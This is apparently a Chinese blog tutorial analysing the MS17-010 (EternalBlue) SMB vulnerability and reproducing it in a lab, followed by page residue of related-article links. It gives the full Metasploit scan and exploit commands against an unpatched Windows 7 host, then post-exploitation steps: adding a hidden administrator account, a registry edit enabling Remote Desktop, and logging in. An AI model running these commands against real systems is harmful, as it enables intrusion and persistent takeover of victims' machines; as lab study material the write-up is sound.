MS17-010(永恒之蓝)漏洞分析与复现
文章目录
- 一、漏洞简介
- 1、永恒之蓝介绍:
- 2、漏洞原理:
- 3、影响版本:
- 二、漏洞复现
- 复现环境:
- 复现过程:
- 1、主机发现:
- 2、使用MSF的永恒之蓝漏洞模块
- 3、使用ms17-010扫描模块,对靶机进行扫描:
- 4、使用ms17-010攻击模块,对靶机进行攻击
- 5、得到靶机shell
- 6、通过shell对靶机进行控制
一、漏洞简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
二、漏洞复现
复现环境:
攻击机:Linux kali(IP:192.168.50.130)
靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)
实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!
复现过程:
1、主机发现:
登录 kali linux,用 nmap 探测本网段存活主机
nmap 192.168.50.0/24
可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。
2、使用MSF的永恒之蓝漏洞模块
打开MSF:msfconsole
MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢 ~( ̄▽ ̄)~
搜索 ms17-010 代码:search ms17_010
这里可以得到一些工具,其中 auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
3、使用ms17-010扫描模块,对靶机进行扫描:
使用模块:
use auxiliary/scanner/smb/smb_ms17_010
设置目标IP或网段:
set rhosts 192.168.50.132
执行扫描:run
如果出现以上情况,就说明存在漏洞。
4、使用ms17-010攻击模块,对靶机进行攻击
使用模块:
use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标IP
set rhosts 192.168.50.132
可以使用 show options 命令查看设置选项
执行攻击:exploit 或 run
攻击完成!
5、得到靶机shell
输入:chcp 65001 可解决乱码问题。
解决了,但是没有完全解决。
6、通过shell对靶机进行控制
1、创建新用户 ,语法:net user 用户名 密码 /add
输入:
net user sss 123456 /add
查看用户信息,命令:net user
可以看到添加成功了。
2、将用户sss添加至管理员组
net localgroup administrators sss /add
3、开启远程桌面功能
查看3389端口状态:netstat -ano
看到3389端口并没有开启,开启3389端口,命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3389端口开启。
4、远程桌面连接靶机
rdesktop 192.168.50.132:3389
使用创建的sss用户进行登录
登陆成功!
上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多。
MS17-010(永恒之蓝)漏洞分析与复现相关推荐
- 永恒之蓝漏洞分析与防护技术
前言 自从上次快把HEVD栈溢出的博客写完,不小心手贱点关了,结果菜鸡的我一顿操作都没找回来,就不想写博客了(后来大佬说使用windbg附加,找到那块内存,dump出来就可以还原了,自己还是太年轻呀) ...
- 永恒之蓝漏洞分析与防范
漏洞利用原理 永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行.在Windows操作系统中,SMB服务默认是开启的,监听端口默认为4 ...
- 可刑又可拷!永恒之蓝漏洞原理及复现
一.永恒之蓝介绍 1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
- Windows下的MS17-010(永恒之蓝)漏洞分析与复现
目录 一.漏洞简介 1.永恒之蓝: 2.漏洞原理: 3.影响版本: 二.复现环境 三.漏洞复现 1.使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态 2.启动kali自带的m ...
- 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现
文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...
- 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大
一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...
- 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...
- 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...
最新文章
- 认识计算机ppt课件游戏,认识计算机)ppt课件
- qt 信号多个链接槽_Qt原理窥探信号槽的实现细节
- 使用navicat 复制 数据库 使用mysql5.7 utf8mb4 utf8mb4_general_ci 爬虫的时候就支持表情包了
- java报错 csrf_spring security配置(.antMatchers(/).permitAll())后,页面CSRF均报错
- css span 右端对齐_使用 CSS 实现具有方面感知的幽灵按钮
- [Xcode 实际操作]一、博主领进门-(15)读取当前应用的信息
- 蚁群算法求TSP问题matlab代码
- (附源码)微信小程序 Demo
- python基础课件
- easypoi 批量导出_浅谈easypoi快速实现excel批量导入
- pos机v1,简单pos机
- hpe服务器中ilo的作用,产品技术-HPE iLO-新华三集团-H3C
- 【XSS技巧拓展】————4、浅谈跨站脚本攻击与防御
- Moment.js 2.22.2 源代码
- 高德地图自定义点标记踩坑
- 扇贝开发:国内NFT平台运营主要合规问题
- 学计算机在职硕士,计算机在职研究生的学习方式有哪些?
- 【Python】羊车门问题random方法实现
- 2017多校第3场 HDU 6058 Kanade's sum 双链表,思维
- python 读取doc 和 docx
热门文章
- tornado 模板
- 计算机里硬盘图标,计算机中在硬盘图标下面有个其他里PPS图标肿么删?
- Python工程师学习笔记
- 从2019年-2021年的各大顶会论文,看动态神经网络的发展
- ACL 2019开源论文 | 基于Attention的知识图谱关系预测
- 论文共读 | “阳奉阴违”的半监督学习算法 - Virtual Adversarial Training
- pytorch拼接函数:torch.stack()和torch.cat()--详解及例子
- access找不到输入表或者dual_数据表dual表的用途是什么?
- github常见操作和常见错误!错误提示:fatal: remote origin already exists.
- r语言x c(-1 -2),【软件】R语言入门之向量